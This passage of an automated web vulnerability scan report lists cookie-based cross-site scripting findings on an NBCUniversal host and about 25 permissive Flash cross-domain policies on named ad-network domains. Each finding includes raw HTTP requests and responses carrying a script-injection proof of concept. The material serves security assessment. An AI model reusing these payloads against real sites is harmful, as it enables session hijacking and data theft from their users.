width=\"1\" alt=\"\"/>...[SNIP]...
3.98. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://snas.nbcuni.com
Path:
/snas/api/getRemoteDomainCookies
Issue detail
The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload 5b8f5<script>alert(1)</script>aa3aff42c32 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1 Host: snas.nbcuni.com Proxy-Connection: keep-alive Referer: http://data.cnbc.com/quotes/.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|27331A26051D3991-6000010800171907[CE]; JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:11:18 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Set-Cookie: JSESSIONID=6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32; Path=/ Cache-Control: max-age=10 Expires: Tue, 06 Sep 2011 15:11:28 GMT Content-Length: 208 Content-Type: text/html __nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"6D56CDC00D764468C0E55EBDC52CFB155b8f5<script>alert(1)</script>aa3aff42c32 ","s_vi":"[CS]v1|27331A26051D3991-6000010800171907[CE]"}});
3.99. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_nr cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://snas.nbcuni.com
Path:
/snas/api/getRemoteDomainCookies
Issue detail
The value of the s_nr cookie is copied into the HTML document as plain text between tags. The payload 60d58<script>alert(1)</script>39205ed221 was submitted in the s_nr cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1 Host: snas.nbcuni.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: s_nr=131344646830060d58<script>alert(1)</script>39205ed221 ; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:50 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA_CP15 (build: CVSTag=https://svn.jboss.org/repos/jbossas/tags/JBoss_4_0_5_GA_CP15 date=200901081058)/Tomcat-5.5 Cache-Control: max-age=10 Expires: Tue, 06 Sep 2011 15:01:00 GMT Content-Length: 207 Content-Type: text/html __nbcsnasadops.doSCallback({ "cookie":{"s_nr":"131344646830060d58<script>alert(1)</script>39205ed221 ","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});
3.100. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [s_vi cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://snas.nbcuni.com
Path:
/snas/api/getRemoteDomainCookies
Issue detail
The value of the s_vi cookie is copied into the HTML document as plain text between tags. The payload 1a3d0<script>alert(1)</script>a48e60d2b0a was submitted in the s_vi cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1 Host: snas.nbcuni.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]1a3d0<script>alert(1)</script>a48e60d2b0a
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:53 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=10 Expires: Tue, 06 Sep 2011 15:01:03 GMT Content-Length: 208 Content-Type: text/html __nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]1a3d0<script>alert(1)</script>a48e60d2b0a "}});
4. Flash cross-domain policy
previous
next
There are 135 instances of this issue:
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user. Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
4.1. http://a.tribalfusion.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a.tribalfusion.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.tribalfusion.com
Response
HTTP/1.0 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 305 X-Reuse-Index: 1 Content-Type: text/xml Content-Length: 102 Connection: Close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy>
4.2. http://a1.interclick.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://a1.interclick.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: a1.interclick.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT Accept-Ranges: bytes ETag: "df382cb6d57cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI" Date: Tue, 06 Sep 2011 14:57:10 GMT Xonnection: Xeep-alive Content-Length: 225 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " />...[SNIP]...
4.3. http://action.mathtag.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://action.mathtag.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: action.mathtag.com
Response
HTTP/1.1 200 OK Content-Type: text/xml P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Content-Length: 215 Date: Tue, 06 Sep 2011 16:45:41 GMT Accept-Ranges: bytes Cache-Control: no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-...[SNIP]...
4.4. http://ad.doubleclick.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 258 Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT Date: Tue, 06 Sep 2011 17:05:42 GMT <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> ...[SNIP]... <allow-access-from domain="* " />...[SNIP]...
4.5. http://admin.brightcove.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://admin.brightcove.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: admin.brightcove.com
Response
HTTP/1.0 200 OK Server: Apache ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753" Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT Accept-Ranges: bytes Content-Length: 386 Content-Type: application/xml Cache-Control: max-age=1200 Date: Tue, 06 Sep 2011 16:12:55 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <!-- Note: secure=false is confusing, but basically its saying to allow SSL connections. Their reasoning is something abo...[SNIP]... <allow-access-from domain="* " secure="false" />...[SNIP]...
4.6. http://ads.pointroll.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.pointroll.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ads.pointroll.com
Response
HTTP/1.1 200 OK Content-Length: 170 Content-Type: text/xml Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT Accept-Ranges: bytes ETag: "8e43ce60b7d5ca1:15f2" Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Date: Tue, 06 Sep 2011 14:57:09 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="* " /> <allow-http-request-headers-from domain="*" headers="*"/> </cross-domain-policy>
4.7. http://ads.rnmd.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.rnmd.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ads.rnmd.net
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:07:48 GMT Server: Apache/2.2.3 (CentOS) Vary: Cookie Last-Modified: Fri, 26 Aug 2011 16:48:34 GMT ETag: "150291-80-4ab6b50e6dc80" Accept-Ranges: bytes Content-Length: 128 Connection: close Content-Type: text/xml <?xml version="1.0" encoding="utf-8"?> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy>
4.8. http://afe.specificclick.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://afe.specificclick.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: afe.specificclick.net
Response
HTTP/1.1 200 OK Server: WebStar 1.0 Content-Type: text/xml Content-Length: 194 Date: Tue, 06 Sep 2011 14:59:04 GMT Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="* " /></cross-domain-policy>
4.9. http://ajax.googleapis.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ajax.googleapis.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ajax.googleapis.com
Response
HTTP/1.0 200 OK Expires: Tue, 06 Sep 2011 23:17:09 GMT Date: Mon, 05 Sep 2011 23:17:09 GMT Content-Type: text/x-cross-domain-policy X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=86400 Age: 58526 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy...[SNIP]...
4.10. http://altfarm.mediaplex.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://altfarm.mediaplex.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: altfarm.mediaplex.com
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 ETag: W/"204-1158796163000" Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT Content-Type: text/xml Content-Length: 204 Date: Tue, 06 Sep 2011 15:37:49 GMT Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-poli...[SNIP]...
4.11. http://at.amgdgt.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://at.amgdgt.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: at.amgdgt.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:37:51 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Fri, 21 May 2010 08:32:40 GMT ETag: "308cb3d-12e-4871688bd9a00" Accept-Ranges: bytes Content-Length: 302 Cache-Control: max-age=21600 Expires: Tue, 06 Sep 2011 21:37:51 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> <allow-access-from domain="all " />...[SNIP]...
4.12. http://b.scorecardresearch.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.scorecardresearch.com
Response
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Wed, 07 Sep 2011 14:56:57 GMT Date: Tue, 06 Sep 2011 14:56:57 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* "/> </cross-domain-policy...[SNIP]...
4.13. http://c.betrad.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://c.betrad.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: c.betrad.com
Response
HTTP/1.0 200 OK Server: Apache ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864" Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT Accept-Ranges: bytes Content-Length: 204 Content-Type: application/xml Date: Tue, 06 Sep 2011 14:59:07 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-poli...[SNIP]...
4.14. http://c.brightcove.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://c.brightcove.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: c.brightcove.com
Response
HTTP/1.1 200 OK X-BC-Client-IP: 50.23.123.106 X-BC-Connecting-IP: 50.23.123.106 Last-Modified: Tue, 02 Aug 2011 23:56:42 UTC Cache-Control: must-revalidate,max-age=0 Content-Type: application/xml Content-Length: 387 Date: Tue, 06 Sep 2011 16:12:55 GMT Connection: keep-alive Server: <?xml version="1.0"?> <cross-domain-policy> <!-- Note: secure=false is confusing, but basically its saying to allow SSL connections. Their reasoning is something abo...[SNIP]... <allow-access-from domain="* " secure="false" />...[SNIP]...
4.15. http://cache.specificmedia.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://cache.specificmedia.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cache.specificmedia.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:59:08 GMT Server: PWS/1.7.3.3 X-Px: ms lax-agg-n18 ( lax-agg-n43), ht-d lax-agg-n43.panthercdn.com Cache-Control: max-age=604800 Expires: Fri, 09 Sep 2011 01:38:58 GMT Age: 393610 Content-Length: 194 Content-Type: text/xml Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="* " /></cross-domain-policy>
4.16. http://cdn.gigya.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://cdn.gigya.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn.gigya.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT ETag: "80b2ea66b4efcb1:0" Server: Microsoft-IIS/7.5 X-Server: web103 Cache-Control: max-age=86400 Date: Tue, 06 Sep 2011 14:56:31 GMT Content-Length: 355 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="mas...[SNIP]... <allow-access-from domain="* " to-ports="80" />...[SNIP]... <allow-access-from domain="* " to-ports="443" secure="false" />...[SNIP]...
4.17. http://cdn5.tribalfusion.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://cdn5.tribalfusion.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn5.tribalfusion.com
Response
HTTP/1.0 200 OK P3p: CP="NOI DEVo TAIa OUR BUS" X-Function: 305 Content-Length: 102 X-Reuse-Index: 18 Content-Type: text/xml Date: Tue, 06 Sep 2011 14:59:04 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy>
4.18. http://clk.fetchback.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://clk.fetchback.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: clk.fetchback.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:22 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT Accept-Ranges: bytes Content-Length: 213 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " secure="false"/> </cross-do...[SNIP]...
4.19. http://content.links.channelintelligence.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://content.links.channelintelligence.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: content.links.channelintelligence.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT ETag: "eb20ee82e722c81:2813" Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 16:45:40 GMT Content-Length: 206 Connection: close <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-polic...[SNIP]...
4.20. http://content.plymedia.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://content.plymedia.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: content.plymedia.com
Response
HTTP/1.0 200 OK Cache-Control: public, max-age=25 Content-Type: text/xml; charset=utf-8 Expires: Tue, 06 Sep 2011 16:13:26 GMT Server: Microsoft-IIS/7.0 X-AspNetMvc-Version: 3.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 16:13:00 GMT Content-Length: 682 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all...[SNIP]... <allow-access-from domain="* " />...[SNIP]...
4.21. http://core.insightexpressai.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://core.insightexpressai.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: core.insightexpressai.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT ETag: "0f7cfb64da4ca1:0" Server: Microsoft-IIS/7.0 P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA" Date: Tue, 06 Sep 2011 14:57:00 GMT Content-Length: 139 Connection: close Cache-Control: no-store <cross-domain-policy> <allow-access-from domain="* " /> <site-control permitted-cross-domain-policies="all"/> </cross-domain-policy>
4.22. http://d.adroll.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://d.adroll.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: d.adroll.com
Response
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Tue, 06 Sep 2011 15:32:14 GMT Content-Type: text/xml Content-Length: 201 Last-Modified: Wed, 24 Aug 2011 20:02:16 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy>...[SNIP]...
4.23. http://d.ads.readwriteweb.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://d.ads.readwriteweb.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: d.ads.readwriteweb.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:46 GMT Server: Apache Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT ETag: "49c238-c7-497e11c2d28c0" Accept-Ranges: bytes Content-Length: 199 Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy>
4.24. http://d1.openx.org/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://d1.openx.org
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: d1.openx.org
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:27 GMT Server: Apache Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT ETag: "78412-c7-48f142a249100" Accept-Ranges: bytes Content-Length: 199 Content-Type: text/xml Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="* " /> </cross-domain-policy>
4.25. http://d7.zedo.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://d7.zedo.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
